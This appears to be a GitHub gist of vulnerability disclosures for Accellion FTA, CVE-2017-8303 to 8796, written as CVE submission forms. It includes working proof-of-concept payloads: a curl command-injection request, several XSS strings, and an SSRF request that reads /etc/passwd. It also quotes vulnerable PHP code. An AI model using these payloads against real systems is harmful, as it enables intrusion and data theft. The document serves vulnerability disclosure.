Skip to content

Instantly share code, notes, and snippets.

Embed
What would you like to do?
Accellion FTA CVEs
RCE: CVE-2017-8303
> curl -i '/find.api' --data "method=x%27%60id>/tmp/zz%60%27&oauth_token=b"
> -H 'Content-type: application/x-www-form-urlencoded'
>
> This Payload executes "id >/tmp/zz".
>
> ------------------------------------------
>
> [VulnerabilityType Other]
> Remote Code Execution
>
> ------------------------------------------
>
> [Vendor of Product]
> Accellion
>
> ------------------------------------------
>
> [Affected Product Code Base]
> Accellion FTA - before FTA_9_12_180
>
> ------------------------------------------
>
> [Affected Component]
> all versions before Accellion FTA_9_12_180
>
> ------------------------------------------
>
> [Attack Type]
> Remote
>
> ------------------------------------------
>
> [Impact Code execution]
> true
>
> ------------------------------------------
>
> [Impact Information Disclosure]
> true
>
> ------------------------------------------
>
> [Attack Vectors]
> by sending a specifically crafted CURL request to the user
> https://whitehat-fta.accellion.net/seos/1000/find.api a remote
> attacker will be able to execute code
>
> ------------------------------------------
DOM XSS: CVE-2017-8304
> POC: https://fta/courier/1000@/oauth/playground/callback.html#<img src=x onerror=alert('xss')>
>
> ------------------------------------------
>
> [Vulnerability Type]
> Cross Site Scripting (XSS)
>
> ------------------------------------------
>
> [Vendor of Product]
> Accellion
>
> ------------------------------------------
>
> [Affected Product Code Base]
> Accellion FTA - before FTA_9_12_180
>
> ------------------------------------------
>
> [Affected Component]
> Accellion before FTA_9_12_180
>
> ------------------------------------------
>
> [Attack Type]
> Remote
>
> ------------------------------------------
>
> [Impact Code execution]
> true
>
> ------------------------------------------
>
> [Impact Information Disclosure]
> true
>
> ------------------------------------------
>
> [Attack Vectors]
> The issue is caused by a javascript code doing
> $('redirect_uri').innerHTML = location.href;
>
> ------------------------------------------
>
> [Has vendor confirmed or acknowledged the vulnerability?]
> true
>
> ------------------------------------------
RXSS:CVE-2017-8760
> Accellion FTA tries to use internal WAF filters to stop specific XSS
> Vulnerabilities. However, these can be bypassed by using some
> modifications to the payloads
>
> ------------------------------------------
>
> [Vulnerability Type]
> Cross Site Scripting (XSS)
>
> ------------------------------------------
>
> [Vendor of Product]
> Accellion
>
> ------------------------------------------
>
> [Affected Product Code Base]
> Accellion FTA - before FTA_9_12_180
>
> ------------------------------------------
>
> [Affected Component]
> FTA before FTA_9_12_180
>
> ------------------------------------------
>
> [Attack Type]
> Remote
>
> ------------------------------------------
>
> [Impact Code execution]
> true
>
> ------------------------------------------
>
> [Attack Vectors]
> https://FTA/hitehat-fta.accellion.net/courier/1000@/index.html?auth=oauth&auth_params=asdf%22%3E%20%3Cimg%20src%3Dx%20onerror%3Dalert(%27alert%60xss%60%27)%2F%2F%3E
>
> ------------------------------------------
>
> [Reference]
> https://accellion.com/
>
> ------------------------------------------
>
> [Has vendor confirmed or acknowledged the vulnerability?]
> true
>
> ------------------------------------------
CRLF CVE-2017-8788
> [VulnerabilityType Other]
> CRLF
>
> ------------------------------------------
>
> [Vendor of Product]
> Accellion
>
> ------------------------------------------
>
> [Affected Product Code Base]
> Accellion FTA - before FTA_9_12_180
>
> ------------------------------------------
>
> [Affected Component]
> before FTA_9_12_180
>
> ------------------------------------------
>
> [Attack Type]
> Remote
>
> ------------------------------------------
>
> [Impact Information Disclosure]
> true
>
> ------------------------------------------
>
> [Attack Vectors]
> there is a CRLF vulnerability in settings_global_text_edit.php because of
> 228: $html_id = ($_GET['html_id'] : $_POST['html_id']);
> 33: $display = ($_GET['display'] : $_POST['display']);
> header('Location: settings_global_text_edit.html?simple=1&display=' . $display .
> '&saved=1&html_id=' . $html_id . '&text=' . urlencode($_POST['service_name'] : $_POST['wc_disclaimer']));
>
> which attacker can exploit by sending ?display=x%0Dnewline in Google Chrome and IE
>
> ------------------------------------------
>
> [Has vendor confirmed or acknowledged the vulnerability?]
> true
>
> ------------------------------------------
SQL Injection CVE-2017-8789
> [Vulnerability Type]
> SQL Injection
>
> ------------------------------------------
>
> [Vendor of Product]
> Accellion
>
> ------------------------------------------
>
> [Affected Product Code Base]
> Accellion FTA - before FTA_9_12_180
>
> ------------------------------------------
>
> [Affected Component]
> report_error.php
>
> ------------------------------------------
>
> [Attack Type]
> Remote
>
> ------------------------------------------
>
> [Impact Code execution]
> true
>
> ------------------------------------------
>
> [Impact Information Disclosure]
> true
>
> ------------------------------------------
>
> [Attack Vectors]
> 65: $year1 = $_GET['year1'];
> 165: $sql = 'SELECT COUNT(*) FROM t_error_log ' . "\n" . ' WHERE c_timestamp >= \'' . $year1 . '-' . $month1 ....
>
> attacker can send report_error.php?year='payload
>
> ------------------------------------------
>
> [Has vendor confirmed or acknowledged the vulnerability?]
> true
>
> ------------------------------------------
LDAP Injection CVE-2017-8790
> [VulnerabilityType Other]
> LDAP Injection
>
> ------------------------------------------
>
> [Vendor of Product]
> Accellion
>
> ------------------------------------------
>
> [Affected Product Code Base]
> Accellion FTA - before FTA_9_12_180
>
> ------------------------------------------
>
> [Affected Component]
> Accellion before FTA_9_12_180 home/seos/courier/ldaptest.html POST parameter "filter" can be used to
> perform LDAP Injection attacks
>
> ------------------------------------------
>
> [Attack Type]
> Remote
>
> ------------------------------------------
>
> [Impact Code execution]
> true
>
> ------------------------------------------
>
> [Impact Information Disclosure]
> true
>
> ------------------------------------------
>
> [Attack Vectors]
> 80: $_POST['filter'] ='objectclass=*'; //unsanitized
> 118:$result = ldap_search($conn, $_POST['basedn'], $_POST['filter'])))
>
> by sending a POST request to ...
>
> ------------------------------------------
>
> [Has vendor confirmed or acknowledged the vulnerability?]
> true
>
> ------------------------------------------
> [VulnerabilityType Other]
> CRLF
>
> ------------------------------------------
>
> [Vendor of Product]
> Accellion
>
> ------------------------------------------
>
> [Affected Product Code Base]
> Accellion FTA - before FTA_9_12_180
>
> ------------------------------------------
>
> [Affected Component]
> Http response splitting In home/seos/courier/login.html
>
> 29: $login_param.= '&auth=oauth&admin=1&auth_params=' .($_GET['auth_params'] :
> $_POST['auth_p arams']); //unsanitized params of GET and POST
> 01: $ldap_err = '&ldap_err_msg=1'; 121: header('Loc ...
>
> ------------------------------------------
>
> [Attack Type]
> Remote
>
> ------------------------------------------
>
> [Impact Code execution]
> true
>
> ------------------------------------------
>
> [Impact Information Disclosure]
> true
>
> ------------------------------------------
>
> [Attack Vectors]
> By using home/seos/courier/login.html?auth_params=x%0Dnew:header or POST of 'auth_p arams'
> attacker will be able to split headers and cause a CRLF attack
>
> ------------------------------------------
>
> [Has vendor confirmed or acknowledged the vulnerability?]
> true
>
> ------------------------------------------
>
> [Discoverer]
> Paulos Yibelo
Use CVE-2017-8791.
> [Vulnerability Type]
> Cross Site Scripting (XSS)
>
> ------------------------------------------
>
> [Vendor of Product]
> Accellion
>
> ------------------------------------------
>
> [Affected Product Code Base]
> Accellion FTA - before FTA_9_12_180
>
> ------------------------------------------
>
> [Affected Component]
> Cross Site Scripting In home/seos/courier/user_add.html
>
> 476: $back = ($_POST['param'] : 'user_list.html'); 503: echo '';
>
> ------------------------------------------
>
> [Attack Type]
> Remote
>
> ------------------------------------------
>
> [Impact Code execution]
> true
>
> ------------------------------------------
>
> [Impact Information Disclosure]
> true
>
> ------------------------------------------
>
> [Attack Vectors]
> by sending a POST request to the param parameter to user_add.html with
> a paylaod like <script>alert()</script> attacker can cause XSS attacks
>
> ------------------------------------------
>
> [Has vendor confirmed or acknowledged the vulnerability?]
> true
>
> ------------------------------------------
>
> [Discoverer]
> Paulos Yibelo
Use CVE-2017-8792.
> [Suggested description]
> by sending a POST request to that URL with
> attacker domain to the acallow parameter, server will respond with
> Access-Control-Allow-Origin header allowing attacker site access.
>
> ------------------------------------------
>
> [VulnerabilityType Other]
> SOP Bypass
>
> ------------------------------------------
>
> [Vendor of Product]
> Accellion
>
> ------------------------------------------
>
> [Affected Product Code Base]
> Accellion FTA - before FTA_9_12_180
>
> ------------------------------------------
>
> [Affected Component]
> In home/seos/courier/web/wmProgressstat.html.php
>
> ------------------------------------------
>
> [Attack Type]
> Remote
>
> ------------------------------------------
>
> [Impact Information Disclosure]
> true
>
> ------------------------------------------
>
> [Attack Vectors]
> 36: if(((isset($_POST['acallow']) &&isset($_POST['cka'])) &&$_POST['cka'] == 1))//required
> 37: $acallow = $_POST['acallow'];//unsanitized
> 38: header('Access-Control-Allow-Origin: https://'. $acallow);
>
> ------------------------------------------
>
> [Has vendor confirmed or acknowledged the vulnerability?]
> true
>
> ------------------------------------------
>
> [Discoverer]
> Paulos Yibelo
Use CVE-2017-8793.
> [VulnerabilityType Other]
> Server Side Request Forgery
>
> ------------------------------------------
>
> [Vendor of Product]
> Accellion
>
> ------------------------------------------
>
> [Affected Product Code Base]
> Accellion FTA - before FTA_9_12_180
>
> ------------------------------------------
>
> [Affected Component]
> /courier/web/1000@/wmProgressval.html
>
> ------------------------------------------
>
> [Attack Type]
> Remote
>
> ------------------------------------------
>
> [Impact Code execution]
> true
>
> ------------------------------------------
>
> [Impact Information Disclosure]
> true
>
> ------------------------------------------
>
> [Attack Vectors]
> because regexp is missing a ^ char in the start, so it's enough to have https: somewhere later in the url,
> so file:///etc/passwd#https:/... works
>
> Payload: curl -i 'https://whitehat-fta.accellion.net/courier/web/1000@/wmProgressval.html'
> --data 'server=file:///etc/passwd#https://xwhitehat-fta.accellion.net'
>
> ------------------------------------------
>
> [Has vendor confirmed or acknowledged the vulnerability?]
> true
>
> ------------------------------------------
>
> [Discoverer]
> Paulos Yibelo
Use CVE-2017-8794.
> [Vulnerability Type]
> Cross Site Scripting (XSS)
>
> ------------------------------------------
>
> [Vendor of Product]
> Accellion
>
> ------------------------------------------
>
> [Affected Product Code Base]
> Accellion FTA - before FTA_9_12_180
>
> ------------------------------------------
>
> [Affected Component]
> Cross Site Scripting In home/seos/courier/smtpg_add.html
>
> ------------------------------------------
>
> [Attack Type]
> Remote
>
> ------------------------------------------
>
> [Impact Code execution]
> true
>
> ------------------------------------------
>
> [Impact Information Disclosure]
> true
>
> ------------------------------------------
>
> [Attack Vectors]
> Cross Site Scripting In home/seos/courier/smtpg_add.html.php
> 162: $back = ($_POST['param'] : 'smtpg_list.html'); //unsanitized POST*'param'+ 177: echo '';
> 177: echo "<input class=\'button\'type=\'button\'value=\'Back\'onClick=\'window.location=".htmlentities($back)."'">
>
> By sending payloads like javascript:alert(0) to the POST `param` attacker will be able to execute attacks.
>
> ------------------------------------------
>
> [Has vendor confirmed or acknowledged the vulnerability?]
> true
>
> ------------------------------------------
>
> [Discoverer]
> Paulos Yibelo
Use CVE-2017-8795.
> [Vulnerability Type]
> SQL Injection
>
> ------------------------------------------
>
> [Vendor of Product]
> Accellion
>
> ------------------------------------------
>
> [Affected Product Code Base]
> Accellion FTA - before FTA_9_12_180
>
> ------------------------------------------
>
> [Affected Component]
> In /seos/courier/communication_p2p.php
>
> 19: $app_id = $_POST['app_id']; Then line
> 21: $sql = 'SELECT apps.loc_id,active,relay_ip FROM apps,servers WHERE
> apps.loc_id=servers.loc_id AND apps.app_id=' . mysql_real_escape_string( $app_id );
>
> ------------------------------------------
>
> [Attack Type]
> Remote
>
> ------------------------------------------
>
> [Impact Code execution]
> true
>
> ------------------------------------------
>
> [Impact Information Disclosure]
> true
>
> ------------------------------------------
>
> [Attack Vectors]
> This bug is a perfect example of an incorrect usage of the function
> mysql_real_escape_string. Since the function is suppose to help with
> escaping quotes but there are zero quotes in there. So attacker can
> still execute SQL statements without sending any quotes, simply by
> adding his statement like
> X AND UNION DO THIS-
>
> This will execute:
>
> 'SELECT apps.loc_id,active,relay_ip FROM apps,servers WHERE
> apps.loc_id=servers.loc_id AND apps.app_id= X AND UNION DO THIS-
> As you can clearly see, you need to put things in quote before calling
> the function or the function it self will have nothing to escape
> quotes from.
>
> ------------------------------------------
>
> [Has vendor confirmed or acknowledged the vulnerability?]
> true
>
> ------------------------------------------
>
> [Discoverer]
> Paulos Yibelo
Use CVE-2017-8796.
@Hoom21

This comment has been minimized.

Copy link

Hoom21 commented Jun 5, 2017

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
You can’t perform that action at this time.